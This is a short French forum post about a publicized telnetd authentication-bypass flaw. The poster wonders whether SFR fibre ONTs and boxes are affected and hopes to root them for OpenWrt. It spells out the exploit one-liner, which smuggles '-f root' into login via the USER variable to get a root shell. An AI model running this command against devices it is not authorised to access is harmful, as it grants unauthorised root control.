La Fibre

Datacenter et équipements réseaux => Routeurs => Remplacer la box SFR par un routeur => Discussion démarrée par: rooot le 27 janvier 2026 à 08:27:19

Titre: Faille Telnetd
Posté par: rooot le 27 janvier 2026 à 08:27:19: Salut a tous,
suite a la lecture de cette news : https://korben.info/telnetd-faille-root-exploit.html
certains d'entre vous ont ils testé sur leur ONT externe SFR ? ou leur ONT SFP car il me semble que telnet est actif sur certains firmware. Je ne sais plus si la box NB6VAC n'a pas son telnet activé aussi ?!

Citer
En gros, le serveur telnetd passe la variable d'environnement USER directement à la commande login sans la nettoyer. Du coup, un attaquant n'a qu'à définir USER sur -f root

et utiliser telnet -a pour se retrouver connecté en root.

Donc si je comprends bien :
USER='-f root'
telnet -a 192.168.x.x

ici je vois qu'ils mettent tout sur la meme ligne : https://medium.com/@shivam_bathla/telnetd-auth-bypass-to-root-f6e239d692b5
Code: [Sélectionner]
USER="-f root" telnet -a IP_ADDRESS [PORT]
Cette astuce va etre utile pour rooter certains routeurs et faciliter leur passage sous openwrt ;D

SMF 2.0.19 | SMF © 2011, Simple Machines
Simple Audio Video Embedder